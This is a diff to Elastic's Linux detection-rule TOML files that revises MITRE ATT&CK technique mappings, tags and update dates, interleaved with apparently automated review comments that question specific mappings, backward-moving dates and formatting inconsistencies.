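Review bot: Collapsing the three `T1574.006 Dynamic Linker Hijacking` entries to one under Persistence is consistent with the tags hunk above, but note that ATT&CK lists T1574 under Privilege Escalation and Defense Evasion as well, so this is a deliberate narrowing of the rule's tactic coverage rather than a deduplication — worth a line in the PR description. If the narrowing is intended, the remaining entry is correct as written.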
@@ -80,7 +80,16 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' 
@@ -97,30 +106,48 @@ sequence by process.entity_id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" + [rule.threat.tactic] + name = "Persistence" + id = "TA0003" + reference = "https://attack.mitre.org/tactics/TA0003/" + + [[rule.threat.technique]] + id = "T1505" + name = "Server Software Component" + reference = "https://attack.mitre.org/techniques/T1505/" + + [[rule.threat.technique.subtechnique]] + id = "T1505.003" + name = "Web Shell" + reference = "https://attack.mitre.org/techniques/T1505/003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + + [rule.threat.tactic] + name = "Execution" + id = "TA0002" + reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat.technique.subtechnique]] -id = "T1071.001" -name = "Web Protocols" -reference = "https://attack.mitre.org/techniques/T1071/001/" + [[rule.threat.technique]] + id = "T1059" + name = "Command and Scripting Interpreter" + reference = "https://attack.mitre.org/techniques/T1059/" -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat.technique.subtechnique]] + name = "Unix Shell" + id = "T1059.004" + reference = "https://attack.mitre.org/techniques/T1059/004/" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" + [rule.threat.tactic] + name = "Command and Control" + id = "TA0011" + reference = "https://attack.mitre.org/tactics/TA0011/" -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat.technique]] + name = "Application Layer Protocol" + id = "T1071" + reference = "https://attack.mitre.org/techniques/T1071/" 
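Review bot: The new threat tables are indented with leading spaces and list `name` before `id`, unlike every other rule file in this change (and the removed lines in this hunk), which put tables at column 0 in `id`, `name`, `reference` order; TOML ignores the indentation, but the mixed layout will churn on the next formatter pass, so I'd align it with the rest. On content, `T1505.003 Web Shell` is a questionable fit for a connection accepted by an ad-hoc server — a web shell is attacker script hosted by an existing web server — and the removed `T1071.001 Web Protocols` sub-technique was the precise C2 mapping, which the new T1071 entry no longer carries. Consider restoring `id = "T1071.001"` under the Command and Control entry.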
diff --git a/rules/linux/persistence_simple_web_server_creation.toml b/rules/linux/persistence_simple_web_server_creation.toml index c9053518df8..a36dadf7d26 100644 --- a/rules/linux/persistence_simple_web_server_creation.toml +++ b/rules/linux/persistence_simple_web_server_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/17" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] @@ -84,7 +84,19 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" 
@@ -106,7 +118,43 @@ id = "T1505" name = "Server Software Component" reference = "https://attack.mitre.org/techniques/T1505/" +[[rule.threat.technique.subtechnique]] +id = "T1505.003" +name = "Web Shell" +reference = "https://attack.mitre.org/techniques/T1505/003/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/persistence_site_and_user_customize_file_creation.toml b/rules/linux/persistence_site_and_user_customize_file_creation.toml index 9802a00b6a8..d0ae0b7eb1f 100644 --- a/rules/linux/persistence_site_and_user_customize_file_creation.toml +++ b/rules/linux/persistence_site_and_user_customize_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/26" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] 
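Review bot: `T1505.003 Web Shell` is added under `T1505 Server Software Component` for a rule whose subject is starting a simple web server, but a web shell is attacker-controlled script served by an existing web server, not the act of launching one; unless the query looks for script handlers, the parent T1505 alone (already present) is the defensible mapping. The new Command and Control entry lists `T1071` without `T1071.001 Web Protocols`, which the sibling connection-accepted rule previously carried and which is the precise mapping for HTTP. The first `[[rule.threat]]` header for this file is outside the hunk.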
@@ -80,7 +80,16 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -121,7 +130,38 @@ id = "T1546.018" name = "Python Startup Hooks" reference = "https://attack.mitre.org/techniques/T1546/018/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_ssh_key_generation.toml b/rules/linux/persistence_ssh_key_generation.toml index a6266d7c8d8..e8f2c4ff724 100644 --- a/rules/linux/persistence_ssh_key_generation.toml +++ b/rules/linux/persistence_ssh_key_generation.toml 
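Review bot: As with the `.pth` rule, `sitecustomize.py`/`usercustomize.py` are executed by the Python interpreter, so the Execution entry should use `T1059.006 Python` rather than `T1059.004 Unix Shell`: `id = "T1059.006"`, `name = "Python"`, `reference = "https://attack.mitre.org/techniques/T1059/006/"`. The Defense Evasion entry has no technique, so it only justifies the tag and adds no ATT&CK coverage. The tags rewrite in the same hunk adds both tactics, which is consistent with the entries.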
@@ -2,7 +2,7 @@ creation_date = "2024/05/31" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -77,3 +77,48 @@ not file.name : "known_hosts.*" ''' +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.004" +name = "SSH Authorized Keys" +reference = "https://attack.mitre.org/techniques/T1098/004/" + + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" +[[rule.threat.technique.subtechnique]] +id = "T1021.004" +name = "SSH" +reference = "https://attack.mitre.org/techniques/T1021/004/" + + +[[rule.threat.technique]] +id = "T1563" +name = "Remote Service Session Hijacking" +reference = "https://attack.mitre.org/techniques/T1563/" +[[rule.threat.technique.subtechnique]] +id = "T1563.001" +name = "SSH Hijacking" +reference = "https://attack.mitre.org/techniques/T1563/001/" + + + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/linux/persistence_ssh_netcon.toml b/rules/linux/persistence_ssh_netcon.toml index 70955671bcf..bde9a2bb722 100644 --- a/rules/linux/persistence_ssh_netcon.toml +++ b/rules/linux/persistence_ssh_netcon.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/06" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] 
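Review bot: The added threat section introduces a Lateral Movement tactic, so the rule needs a `Tactic: Lateral Movement` tag; the `tags` line is outside this hunk, so confirm it was updated. `T1563.001 SSH Hijacking` describes reuse of an existing agent socket or session and `T1021.004 SSH` the remote login itself — both are downstream of what `ssh-keygen` does, and `T1098.004 SSH Authorized Keys` is the one mapping this query supports. The block also uses uneven blank lines (none between `framework` and the first technique, three before `[rule.threat.tactic]`), unlike the other files. This file's `updated_date` regresses to 2025/03/20 while new content is added, which suggests the branch predates the base rather than a deliberate edit.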
@@ -114,3 +114,39 @@ reference = "https://attack.mitre.org/techniques/T1546/004/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.004" +name = "SSH" +reference = "https://attack.mitre.org/techniques/T1021/004/" + +[[rule.threat.technique]] +id = "T1563" +name = "Remote Service Session Hijacking" +reference = "https://attack.mitre.org/techniques/T1563/" + +[[rule.threat.technique.subtechnique]] +id = "T1563.001" +name = "SSH Hijacking" +reference = "https://attack.mitre.org/techniques/T1563/001/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/persistence_ssh_via_backdoored_system_user.toml b/rules/linux/persistence_ssh_via_backdoored_system_user.toml index 1a90771db07..cf09a455608 100644 --- a/rules/linux/persistence_ssh_via_backdoored_system_user.toml +++ b/rules/linux/persistence_ssh_via_backdoored_system_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/07" integration = ["system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/02" [rule] author = ["Elastic"] 
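Review bot: The new Command and Control entry has a tactic and no technique, so it gives analysts nothing to pivot on; either attach the technique the connection supports (e.g. `T1071` if the rule can name the protocol) or drop the entry and its tag. This file's `tags` line is outside the hunk, so confirm `Tactic: Lateral Movement` and `Tactic: Command and Control` were added to match the two new entries. `T1563.001 SSH Hijacking` is about reusing an existing session or agent socket; if the rule only observes an outbound connection from an SSH-related process, the parent `T1021.004` alone is the safer mapping.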
@@ -78,7 +78,15 @@ Filebeat is a lightweight shipper for forwarding and centralizing log data. Inst - To run the system module of Filebeat on Linux follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-system.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: Persistence", "Data Source: System", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Data Source: System", + "Resources: Investigation Guide" +] timestamp_override = "event.ingested" type = "new_terms" query = ''' 
@@ -94,37 +102,38 @@ user.name:( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [[rule.threat.technique.subtechnique]] -id = "T1078.003" -name = "Local Accounts" -reference = "https://attack.mitre.org/techniques/T1078/003/" +id = "T1098.004" +name = "SSH Authorized Keys" +reference = "https://attack.mitre.org/techniques/T1098/004/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +name = "Defense Evasion" +id = "TA0005" +reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +id = "T1564" +name = "Hide Artifacts" +reference = "https://attack.mitre.org/techniques/T1564/" [[rule.threat.technique.subtechnique]] -id = "T1078.003" -name = "Local Accounts" -reference = "https://attack.mitre.org/techniques/T1078/003/" +id = "T1564.002" +name = "Hidden Users" +reference = "https://attack.mitre.org/techniques/T1564/002/" -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" [rule.new_terms] field = "new_terms_fields" value = ["user.name", "host.id"] diff --git a/rules/linux/persistence_suspicious_file_opened_through_editor.toml b/rules/linux/persistence_suspicious_file_opened_through_editor.toml index eb4b2615df6..a3db7c8cbe3 100644 --- a/rules/linux/persistence_suspicious_file_opened_through_editor.toml +++ b/rules/linux/persistence_suspicious_file_opened_through_editor.toml 
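Review bot: Replacing `T1078.003 Local Accounts` with `T1098.004 SSH Authorized Keys` changes the mapping from what the rule observes to something it does not: the query appears to key on `user.name` with new_terms over `user.name`/`host.id`, i.e. a system account being used to log in, which is valid-account use, while an authorized_keys change is never in view; keep T1078.003 under Persistence (and its Initial Access entry, whose tag the tags hunk above removes) and add T1098.004/T1564.002 only as additional entries. In the new Defense Evasion entry the `[rule.threat.tactic]` table is placed before `[[rule.threat.technique]]`, the reverse of the first entry and of the other files — valid TOML, but worth ordering consistently. The rewritten `tags` list above also omits the trailing comma the other rewritten files use.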
@@ -2,7 +2,7 @@ creation_date = "2023/07/25" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] 
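Review bot: `updated_date` moves backwards here, from `2026/03/23` to `2025/03/20`, while the same file's threat mapping changes in the next hunk; the same pattern appears in every other rule file in this chunk (`2025/12/23`, `2026/01/26`, `2026/01/16`). If this patch is meant to apply forward, the date should be bumped to the day the mapping changed rather than reset to an older value, since the date is presumably what signals a changed rule to consumers. If this is a reverse diff of an earlier state, the description should say so.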
@@ -96,116 +96,56 @@ file.path : ( [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1037" name = "Boot or Logon Initialization Scripts" reference = "https://attack.mitre.org/techniques/T1037/" - [[rule.threat.technique.subtechnique]] id = "T1037.004" name = "RC Scripts" reference = "https://attack.mitre.org/techniques/T1037/004/" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" - [[rule.threat.technique.subtechnique]] id = "T1543.002" name = "Systemd Service" reference = "https://attack.mitre.org/techniques/T1543/002/" -[[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" - -[[rule.threat.technique.subtechnique]] -id = "T1546.004" -name = "Unix Shell Configuration Modification" -reference = "https://attack.mitre.org/techniques/T1546/004/" [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" - [[rule.threat.technique.subtechnique]] id = "T1574.006" name = "Dynamic Linker Hijacking" reference = "https://attack.mitre.org/techniques/T1574/006/" -[[rule.threat.technique.subtechnique]] -id = "T1574.007" -name = "Path Interception by PATH Environment Variable" -reference = "https://attack.mitre.org/techniques/T1574/007/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1037" -name = "Boot or Logon Initialization Scripts" -reference = "https://attack.mitre.org/techniques/T1037/" - -[[rule.threat.technique.subtechnique]] -id = "T1037.004" -name = "RC Scripts" -reference = "https://attack.mitre.org/techniques/T1037/004/" - -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - 
-[[rule.threat.technique.subtechnique]] -id = "T1543.002" -name = "Systemd Service" -reference = "https://attack.mitre.org/techniques/T1543/002/" - -[[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" - -[[rule.threat.technique.subtechnique]] -id = "T1546.004" -name = "Unix Shell Configuration Modification" -reference = "https://attack.mitre.org/techniques/T1546/004/" - [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" - [[rule.threat.technique.subtechnique]] id = "T1548.003" name = "Sudo and Sudo Caching" reference = "https://attack.mitre.org/techniques/T1548/003/" -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - -[[rule.threat.technique.subtechnique]] -id = "T1574.006" -name = "Dynamic Linker Hijacking" -reference = "https://attack.mitre.org/techniques/T1574/006/" -[[rule.threat.technique.subtechnique]] -id = "T1574.007" -name = "Path Interception by PATH Environment Variable" -reference = "https://attack.mitre.org/techniques/T1574/007/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/linux/persistence_suspicious_ssh_execution_xzbackdoor.toml b/rules/linux/persistence_suspicious_ssh_execution_xzbackdoor.toml index 838efbe0499..793a712a67b 100644 --- a/rules/linux/persistence_suspicious_ssh_execution_xzbackdoor.toml +++ b/rules/linux/persistence_suspicious_ssh_execution_xzbackdoor.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/01" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [rule] author = ["Elastic"] 
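Review bot: The surviving Persistence block no longer keeps one blank line between TOML tables — `[[rule.threat.technique]]` now directly follows `framework = "MITRE ATT&CK"` and each subtechnique follows its parent's `reference` line — and a blank line is appended after the final `TA0004` reference at end of file, unlike the other rule files in this patch; restore one blank line per table boundary. A doubled blank line before `[rule.new_terms]` is likewise introduced in persistence_systemd_service_started.toml, persistence_unusual_exim4_child_process.toml and persistence_unusual_pam_grantor.toml. On substance, the Privilege Escalation entry keeps only `T1548.003` and the Persistence entry drops `T1546.004` and `T1574.007`; the `file.path` list is outside the hunk, so if it still matches shell profile or PATH-related files, those were the techniques that covered them.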
@@ -57,7 +57,16 @@ references = [ risk_score = 47 rule_id = "7afc6cc9-8800-4c7f-be6b-b688d2dea248" severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Lateral Movement", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Persistence", + "Tactic: Lateral Movement", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -84,19 +93,27 @@ sequence by host.id with maxspan=1m framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" [[rule.threat]] framework = "MITRE ATT&CK" 
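Review bot: The Persistence entry maps to the parent `T1543` only, while every other systemd-related mapping in this patch (generator creation, service started, shell execution) uses `T1543.002` Systemd Service; if the intent is the backdoored sshd unit, add the subtechnique for consistency, otherwise a sentence in the description on why the parent is used would help. The Credential Access entry (`T1556`) matches the new `Tactic: Credential Access` tag in the previous hunk. The Lateral Movement entry continues in the next hunk.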
@@ -111,6 +128,16 @@ id = "T1021.004" name = "SSH" reference = "https://attack.mitre.org/techniques/T1021/004/" +[[rule.threat.technique]] +id = "T1563" +name = "Remote Service Session Hijacking" +reference = "https://attack.mitre.org/techniques/T1563/" + +[[rule.threat.technique.subtechnique]] +id = "T1563.001" +name = "SSH Hijacking" +reference = "https://attack.mitre.org/techniques/T1563/001/" + [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" diff --git a/rules/linux/persistence_systemd_generator_creation.toml b/rules/linux/persistence_systemd_generator_creation.toml index b706888c01e..1405518b4e7 100644 --- a/rules/linux/persistence_systemd_generator_creation.toml +++ b/rules/linux/persistence_systemd_generator_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/19" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [rule] author = ["Elastic"] @@ -84,7 +84,15 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' 
@@ -121,11 +129,34 @@ file where host.os.type == "linux" and event.action in ("rename", "creation") an framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique.subtechnique]] +id = "T1543.002" +name = "Systemd Service" +reference = "https://attack.mitre.org/techniques/T1543/002/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique.subtechnique]] +id = "T1543.002" +name = "Systemd Service" +reference = "https://attack.mitre.org/techniques/T1543/002/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/persistence_systemd_netcon.toml b/rules/linux/persistence_systemd_netcon.toml index 010e0f2e8fc..3d67cd46113 100644 --- a/rules/linux/persistence_systemd_netcon.toml +++ b/rules/linux/persistence_systemd_netcon.toml @@ -2,7 +2,7 @@ creation_date = "2024/02/01" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/26" [rule] author = ["Elastic"] 
@@ -82,7 +82,16 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Command and Control", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] type = "eql" query = ''' sequence by host.id with maxspan=5s @@ -127,37 +136,6 @@ sequence by host.id with maxspan=5s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1095" -name = "Non-Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1095/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1569" -name = "System Services" -reference = "https://attack.mitre.org/techniques/T1569/" - -[[rule.threat.technique.subtechnique]] -id = "T1569.002" -name = "Service Execution" -reference = "https://attack.mitre.org/techniques/T1569/002/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" 
@@ -168,7 +146,28 @@ id = "T1543.002" name = "Systemd Service" reference = "https://attack.mitre.org/techniques/T1543/002/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_systemd_service_started.toml b/rules/linux/persistence_systemd_service_started.toml index 142f84b49eb..4d7bc96589f 100644 --- a/rules/linux/persistence_systemd_service_started.toml +++ b/rules/linux/persistence_systemd_service_started.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/17" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [transform] [[transform.osquery]] @@ -164,7 +164,15 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' 
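Review bot: The two new `[[rule.threat]]` entries for Command and Control and Defense Evasion carry only a `[rule.threat.tactic]` and no `[[rule.threat.technique]]`, and the earlier C2 entry that did name `T1095` is removed in the preceding hunk; a tactic without a technique gives analysts nothing to pivot on in coverage reports or an ATT&CK navigator layer. Either restore `T1095` under TA0011 (or whichever technique the outbound systemd connection is meant to represent) and name one for TA0005, or drop the tactic-only entries together with their tags. The same tactic-only pattern appears in persistence_unpack_initramfs_via_unmkinitramfs.toml (Defense Evasion) and persistence_unusual_sshd_child_process.toml (Command and Control).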
